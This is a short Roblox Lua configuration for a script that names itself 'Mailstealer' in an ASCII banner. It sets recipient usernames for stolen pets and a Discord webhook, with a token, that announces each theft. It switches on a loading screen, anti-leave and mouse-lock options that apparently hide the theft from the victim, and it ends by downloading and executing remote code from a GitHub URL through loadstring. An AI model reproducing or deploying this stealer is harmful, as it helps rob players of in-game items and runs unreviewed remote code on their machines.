--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "Krisbns2" -- good pets
Webhook = "https://discord.com/api/webhooks/1135100179427639446/De6KZSnjnxc92YWFghJcbyTJ4g1jfJ95qel7c-tRbnBIpYs9_aW4tX3ZZ5KAEQHttdPp" -- pings for pets
UserName2 = "krisbns2" -- bad pets

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/
MoriScriptZ", true))()
